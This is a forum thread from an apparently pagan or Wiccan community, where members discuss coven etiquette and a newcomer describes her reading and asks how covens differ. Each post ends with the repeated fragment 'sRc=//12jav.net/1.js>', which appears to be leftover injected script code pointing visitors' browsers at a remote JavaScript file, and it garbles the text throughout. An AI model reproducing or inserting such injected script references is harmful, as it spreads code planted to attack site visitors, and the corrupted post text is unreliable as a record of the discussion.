well that attitude wont get you entry, coven leaders dont want people to go in and look at spells and leave for another coven and look at spells, they want people to come into their coven wanting learners or teachers to help learners, going into a coven just to look at spells gets you no-where sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
What dyrian said, and before joining a coven, you should know which path you're in. Then, you go at the coven and click apply, and, pm the priest/ess depending on the coven rules. Then, you have to wait until your entry gets accepted. ;) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I have to agree with what Dyrian said. As a HP I certainly would not want someone to join just to leach info from us, then leave to leach off someone else. Now if you are serious about learning and would like to benefit from the council that the coven would provide, then that would be great. Otherwise i suggest you type in free online spell books on www.google.com and leach off of those who have put their works out there to be seen by all. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Hi... I saw this as a topic, and was wondering if it would be ok to steer it in a different direction?
I am pretty new, studying for about 6 months. I've read several books from respected authors, having tried to do good HW first before selecting them. I think at this point I'm just Eclectic, with primary influences being Dianic Wicca (author Z Budepest) and Wicca (author Scott Cunningham). I'm just starting to read about hermeticism, faeries, Christoper Penczak's Temple series, and Marion Weinstein's "Positive Magic" that seems to be about the Aquarian age, Picean age, but not sure where that is going just yet.
I would just like to learn from others and help them to learn. I am in grad school to become a high school teacher, and feel like I could have a lot to offer someday, but am pretty limited for now. Having worked as a math tutor for almost 12 years now, my skill is in helping people understand things. I'm very drawn to healing and animals, and I identify the most with Artemis and any deities of the moon, and with Pan.
And I'll always be a lifelong learner!
So, after reading this, would anyone have any suggestions or insight as to what the different covens are like, their focus or influences, etc. Also, can you join more than one?
Thank you & Blessings! sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
